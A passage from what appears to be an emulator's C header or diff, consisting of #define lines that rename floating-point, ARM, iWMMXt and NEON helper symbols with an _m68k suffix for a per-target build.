floatx80_eq_quiet floatx80_eq_quiet_m68k +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_m68k +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_m68k +#define floatx80_le floatx80_le_m68k +#define floatx80_le_quiet floatx80_le_quiet_m68k +#define floatx80_lt floatx80_lt_m68k +#define floatx80_lt_quiet floatx80_lt_quiet_m68k +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_m68k +#define floatx80_mul floatx80_mul_m68k +#define floatx80_rem floatx80_rem_m68k +#define floatx80_round_to_int floatx80_round_to_int_m68k +#define floatx80_scalbn floatx80_scalbn_m68k +#define floatx80_sqrt floatx80_sqrt_m68k +#define floatx80_sub floatx80_sub_m68k +#define floatx80ToCommonNaN floatx80ToCommonNaN_m68k +#define floatx80_to_float128 floatx80_to_float128_m68k +#define floatx80_to_float32 floatx80_to_float32_m68k +#define floatx80_to_float64 floatx80_to_float64_m68k +#define floatx80_to_int32 floatx80_to_int32_m68k +#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_m68k +#define floatx80_to_int64 floatx80_to_int64_m68k +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_m68k +#define floatx80_unordered floatx80_unordered_m68k +#define floatx80_unordered_quiet floatx80_unordered_quiet_m68k +#define flush_icache_range flush_icache_range_m68k +#define format_string format_string_m68k +#define fp_decode_rm fp_decode_rm_m68k +#define frame_dummy frame_dummy_m68k +#define free_range free_range_m68k +#define fstat64 fstat64_m68k +#define futex_wait futex_wait_m68k +#define futex_wake futex_wake_m68k +#define gen_aa32_ld16s gen_aa32_ld16s_m68k +#define gen_aa32_ld16u gen_aa32_ld16u_m68k +#define gen_aa32_ld32u gen_aa32_ld32u_m68k +#define gen_aa32_ld64 gen_aa32_ld64_m68k +#define gen_aa32_ld8s gen_aa32_ld8s_m68k +#define gen_aa32_ld8u gen_aa32_ld8u_m68k +#define gen_aa32_st16 gen_aa32_st16_m68k +#define gen_aa32_st32 gen_aa32_st32_m68k +#define gen_aa32_st64 gen_aa32_st64_m68k +#define gen_aa32_st8 gen_aa32_st8_m68k +#define gen_adc gen_adc_m68k +#define gen_adc_CC gen_adc_CC_m68k +#define gen_add16 gen_add16_m68k +#define gen_add_carry gen_add_carry_m68k +#define gen_add_CC gen_add_CC_m68k +#define gen_add_datah_offset gen_add_datah_offset_m68k +#define gen_add_data_offset gen_add_data_offset_m68k +#define gen_addq gen_addq_m68k +#define gen_addq_lo gen_addq_lo_m68k +#define gen_addq_msw gen_addq_msw_m68k +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_m68k +#define gen_arm_shift_im gen_arm_shift_im_m68k +#define gen_arm_shift_reg gen_arm_shift_reg_m68k +#define gen_bx gen_bx_m68k +#define gen_bx_im gen_bx_im_m68k +#define gen_clrex gen_clrex_m68k +#define generate_memory_topology generate_memory_topology_m68k +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_m68k +#define gen_exception gen_exception_m68k +#define gen_exception_insn gen_exception_insn_m68k +#define gen_exception_internal gen_exception_internal_m68k +#define gen_exception_internal_insn gen_exception_internal_insn_m68k +#define gen_exception_return gen_exception_return_m68k +#define gen_goto_tb gen_goto_tb_m68k +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_m68k +#define gen_helper_add_saturate gen_helper_add_saturate_m68k +#define gen_helper_add_setq gen_helper_add_setq_m68k +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_m68k +#define gen_helper_clz32 gen_helper_clz32_m68k +#define gen_helper_clz64 gen_helper_clz64_m68k +#define gen_helper_clz_arm gen_helper_clz_arm_m68k +#define gen_helper_cpsr_read gen_helper_cpsr_read_m68k +#define gen_helper_cpsr_write gen_helper_cpsr_write_m68k +#define gen_helper_crc32_arm gen_helper_crc32_arm_m68k +#define gen_helper_crc32c gen_helper_crc32c_m68k +#define gen_helper_crypto_aese gen_helper_crypto_aese_m68k +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_m68k +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_m68k +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_m68k +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_m68k +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_m68k +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_m68k +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_m68k +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_m68k +#define gen_helper_double_saturate gen_helper_double_saturate_m68k +#define gen_helper_exception_internal gen_helper_exception_internal_m68k +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_m68k +#define gen_helper_get_cp_reg gen_helper_get_cp_reg_m68k +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_m68k +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_m68k +#define gen_helper_get_user_reg gen_helper_get_user_reg_m68k +#define gen_helper_iwmmxt_addcb gen_helper_iwmmxt_addcb_m68k +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_m68k +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_m68k +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_m68k +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_m68k +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_m68k +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_m68k +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_m68k +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_m68k +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_m68k +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_m68k +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_m68k +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_m68k +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_m68k +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_m68k +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_m68k +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_m68k +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_m68k +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_m68k +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_m68k +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_m68k +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_m68k +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_m68k +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_m68k +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_m68k +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_m68k +#define gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_m68k +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_m68k +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_m68k +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_m68k +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_m68k +#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_m68k +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_m68k +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_m68k +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_m68k +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_m68k +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_m68k +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_m68k +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_m68k +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_m68k +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_m68k +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_m68k +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_m68k +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_m68k +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_m68k +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_m68k +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_m68k +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_m68k +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_m68k +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_m68k +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_m68k +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_m68k +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_m68k +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_m68k +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_m68k +#define gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_m68k +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_m68k +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_m68k +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_m68k +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_m68k +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_m68k +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_m68k +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_m68k +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_m68k +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_m68k +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_m68k +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_m68k +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_m68k +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_m68k +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_m68k +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_m68k +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_m68k +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_m68k +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_m68k +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_m68k +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_m68k +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_m68k +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_m68k +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_m68k +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_m68k +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_m68k +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_m68k +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_m68k +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_m68k +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_m68k +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_m68k +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_m68k +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_m68k +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_m68k +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_m68k +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_m68k +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_m68k +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_m68k +#define gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_m68k +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_m68k +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_m68k +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_m68k +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_m68k +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_m68k +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_m68k +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_m68k +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_m68k +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_m68k +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_m68k +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_m68k +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_m68k +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_m68k +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_m68k +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_m68k +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_m68k +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_m68k +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_m68k +#define gen_helper_neon_abd_s16 gen_helper_neon_abd_s16_m68k +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_m68k +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_m68k +#define gen_helper_neon_abd_u16 gen_helper_neon_abd_u16_m68k +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_m68k +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_m68k +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_m68k +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_m68k +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_m68k +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_m68k +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_m68k +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_m68k +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_m68k +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_m68k +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_m68k +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_m68k +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_m68k +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_m68k +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_m68k +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_m68k +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_m68k +#define gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_m68k +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_m68k +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_m68k +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_m68k +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_m68k +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_m68k +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_m68k +#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_m68k +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_m68k +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_m68k +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_m68k +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_m68k +#define gen_helper_neon_cgt_u8 gen_helper_neon_cgt_u8_m68k +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_m68k +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_m68k +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_m68k +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_m68k +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_m68k +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_m68k +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_m68k +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_m68k +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_m68k +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_m68k +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_m68k +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_m68k +#define gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_m68k +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_m68k +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_m68k +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_m68k +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_m68k +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_m68k +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_m68k +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_m68k +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_m68k +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_m68k +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_m68k +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_m68k +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_m68k +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_m68k +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_m68k +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_m68k +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_m68k +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_m68k +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_m68k +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_m68k +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_m68k +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_m68k +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_m68k +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_m68k +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_m68k +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_m68k +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_m68k +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_m68k +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_m68k +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_m68k +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_m68k +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_m68k +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_m68k +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_m68k +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_m68k +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_m68k +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_m68k +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_m68k +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_m68k +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_m68k +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_m68k +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_m68k +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_m68k +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_m68k +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_m68k +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_m68k +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_m68k +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_m68k +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_m68k +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_m68k +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_m68k +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_m68k +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_m68k +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_m68k +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_m68k +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_m68k +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_m68k +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_m68k +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_m68k +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_m68k +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_m68k +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_m68k +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_m68k +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_m68k +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_m68k +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_m68k +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_m68k +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_m68k +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_m68k +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_m68k +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_m68k +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_m68k +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_m68k +#define gen_helper_neon_qrdmulh_s32 gen_helper_neon_qrdmulh_s32_m68k +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_m68k +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_m68k +#define gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_m68k +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_m68k +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_m68k +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_m68k +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_m68k +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_m68k +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_m68k +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_m68k +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_m68k +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_m68k +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_m68k +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_m68k +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_m68k +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_m68k +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_m68k +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_m68k +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_m68k +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_m68k +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_m68k +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_m68k +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_m68k +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_m68k +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_m68k +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_m68k +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_m68k +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_m68k +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_m68k +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_m68k +#define gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_m68k +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_m68k +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_m68k +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_m68k +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_m68k +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_m68k +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_m68k +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_m68k +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_m68k +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_m68k +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_m68k +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_m68k +#define gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_m68k +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_m68k +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_m68k +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_m68k +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_m68k +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_m68k +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_m68k +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_m68k +#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_m68k +#define gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_m68k +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_m68k +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_m68k +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_m68k +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_m68k +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_m68k +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_m68k +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_m68k +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_m68k +#define gen_helper_neon_tbl gen_helper_neon_tbl_m68k +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_m68k +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_m68k +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_m68k +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_m68k +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_m68k +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_m68k +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_m68k +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_m68k +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_m68k +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_m68k +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_m68k +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_m68k +#define gen_helper_neon_zip16 gen_helper_neon_zip16_m68k +#define gen_helper_neon_zip8 gen_helper_neon_zip8_m68k +#define gen_helper_pre_hvc gen_helper_pre_hvc_m68k +#define gen_helper_pre_smc gen_helper_pre_smc_m68k +#define gen_helper_qadd16 gen_helper_qadd16_m68k +#define gen_helper_qadd8 gen_helper_qadd8_m68k +#define gen_helper_qaddsubx gen_helper_qaddsubx_m68k +#define gen_helper_qsub16 gen_helper_qsub16_m68k +#define gen_helper_qsub8 gen_helper_qsub8_m68k +#define gen_helper_qsubaddx gen_helper_qsubaddx_m68k +#define gen_helper_rbit gen_helper_rbit_m68k +#define gen_helper_recpe_f32 gen_helper_recpe_f32_m68k +#define gen_helper_recpe_u32 gen_helper_recpe_u32_m68k +#define gen_helper_recps_f32 gen_helper_recps_f32_m68k +#define gen_helper_rintd gen_helper_rintd_m68k +#define gen_helper_rintd_exact gen_helper_rintd_exact_m68k +#define gen_helper_rints gen_helper_rints_m68k +#define gen_helper_rints_exact gen_helper_rints_exact_m68k +#define gen_helper_ror_cc gen_helper_ror_cc_m68k +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_m68k +#define gen_helper_rsqrte_u32 gen_helper_rsqrte_u32_m68k +#define gen_helper_rsqrts_f32 